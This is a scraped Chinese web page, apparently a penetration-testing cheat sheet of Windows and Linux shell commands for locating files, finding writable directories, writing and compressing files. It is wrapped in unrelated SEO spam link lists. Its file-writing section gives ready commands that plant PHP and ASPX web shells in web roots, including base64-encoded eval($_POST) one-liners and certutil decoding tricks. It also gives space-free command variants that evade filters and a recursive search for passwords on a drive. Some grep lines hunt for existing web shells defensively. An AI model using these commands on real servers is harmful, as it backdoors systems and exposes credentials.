当前位置: 首页 > wzjs >正文

短网址在线生成哪个好seo入门讲解

短网址在线生成哪个好,seo入门讲解,网站源码素材,出货入货库存的软件目录 Linux查找文件 Windows查找文件 查找可写目录 windows Linux 创建 Windows Linux 压缩 解压 远程解压文件 Linux查找文件 >find / -name index.php 查找木马文件 >find . -name *.php | xargs grep -n eval( >find . -name *.php | xargs grep -n ass…

目录

 Linux查找文件

Windows查找文件

查找可写目录

windows

Linux

创建

Windows

Linux

压缩

解压

远程解压文件


 Linux查找文件

>find / -name index.php
查找木马文件
>find . -name '*.php' | xargs grep -n 'eval('
>find . -name '*.php' | xargs grep -n 'assert('
>find . -name '*.php' | xargs grep -n 'system('

Windows查找文件

>cd /d E: && dir /b /s index.php
>find /N /I "root" config.php
>for /r E:\ %i in (config*.php) do @echo %i
>for /r E:\ %i in (*.txt) do @echo %i
>findstr /s /n "password" c:\*
>powershell Get-ChildItem d:\ -Include index.php -recurse

查找可写目录

windows

在C:\Users\administrator\Desktop任意子目录  war.txt文件的同目录下
写
for /f %i in ('dir /s /b C:\Users\administrator\Desktop\war.txt') do (echo %i > %i\..\finddir.txt)
删
for /f %i in ('dir /s /b C:\Users\administrator\Desktop\war.txt') do (del %i\..\finddir.txt)
在C:\Users\administrator\Desktop任意子目录  war文件夹下
写
for /f %i in ('dir /s /b C:\Users\administrator\Desktop\war') do (echo %i > %i\finddir.txt)
删
for /f %i in ('dir /s /b C:\Users\administrator\Desktop\war') do (del %i\finddir.txt)

Linux

在/root  war文件的同目录下
写
find /root -name war|while read file;do sh -c "echo $file">$(dirname $file)/finddir.txt;done
删
find /root -name war|while read file;do sh -c "rm $(dirname $file)/finddir.txt";done
在/root  war文件夹下
写
find /root -name war|while read file;do sh -c "echo $file">$file/finddir.txt;done
删
find /root -name war|while read file;do sh -c "rm $file/finddir.txt";done

创建

Windows

读文本文件:
>file = Get-Content "1.txt"
>file
写文件
>powershell Set-content "1.txt" "wocao"
&
>powershell "write-output ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(\"d2Vic2hlbGw=\"))) | out-file -filepath c:\www\wwwroot\1.aspx;"
或
>set /p=^<?php phpinfo()?^><nul>c:\1.php
或
>echo ^<?php phpinfo()?^>>c:\1.php
追加内容
>echo 111>>c:\1.php
不换行追加
>set /p="222">>c:\1.php
分段不换行追加
>echo|set /p=\"PCFET0NUWVBFIGh0bWw+IDxodG1sPiA8aGVhZD4gPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+PGgxPjIwMjHlubR4eHjnvZHnu5zlronlhajlrp7miJjmvJTnu4M8L2gxPg==\" > D:\www\1.txt
读/写入命令无空格
>type;c:\1.php
>echo.111>>c:\1.php
>echo,111>>c:\1.php
写入特殊字符
>certutil -f -decode 1.txt C:\\1.php
>certutil -decodehex 1.txt C:\\1.php

Linux

>echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d > /var/www/html/shell.php
>echo \<\?php eval\(\@\$_POST\[1\]\)\; \?\> >1.php

压缩

>rar.exe a –k –r –s –m3 C:\1.rar C:\wwwroot
>7z.exe a –r –p12345 C:\1.7z C:\wwwroot

解压

>rar.exe e c:\wwwroot\1.rar
>7z.exe x –p12345 C:\1.7z –oC:\wwwroot

远程解压文件

pip install remotezip
#列出远程压缩包文件内容
remotezip -l http://site/bigfile.zip
#解压里面的文件
remotezip "http://site/bigfile.zip" "file.txt"

 

http://www.dtcms.com/wzjs/216105.html

相关文章:

  • 宝鸡品牌网站开发公司推广赚钱平台有哪些
  • 商务网站建设课程设计北京搜索引擎优化管理专员
  • 行远金华网站建设公司谷歌seo排名工具
  • 怎么能看出别人的网站是哪一家做网站建设详细方案
  • 专做男装的网站搜一搜
  • 专门教做甜品的网站上海哪家seo好
  • 领地免费网站开发seo工作职责
  • 怎样做网站的反链宁波seo企业网络推广
  • wordpress 3.5下载关键词优化是怎么做的
  • wordpress无法编辑页面徐州自动seo
  • 网站做友链的好处排行榜123网
  • 阿里云搭wordpress百度seo服务
  • 全国电子网站建设seo关键词排名系统
  • 楚雄做网站百度极速版app下载
  • 网站在百度上做推广怎样做网站网址查询工具
  • 自己建立网站的方法公众号推广费用一般多少
  • 西安的电商网站设计seo是如何优化
  • 房山网站建设服务湖南网站营销推广
  • 怎样仿网站的css特效上街网络推广
  • 精通网站建设pdf下载软文营销案例200字
  • 做网站网上商城多少钱信息流投放平台
  • 网站开发项目建设经验网站网址大全
  • 仿网站建设seo专员岗位职责
  • 中华人民共和国建设和城乡部网站精准客户资源购买
  • 舆情优化软件优化
  • 中国反钓鱼网站联盟现在什么网络推广好
  • 先做亚马逊网站怎么操作整合营销的概念
  • 做网站的软件图标人民日报最新消息
  • 做网站被骗没有居住证能不能告他今日关键词
  • 精神文明网站建设内容互联网广告平台排名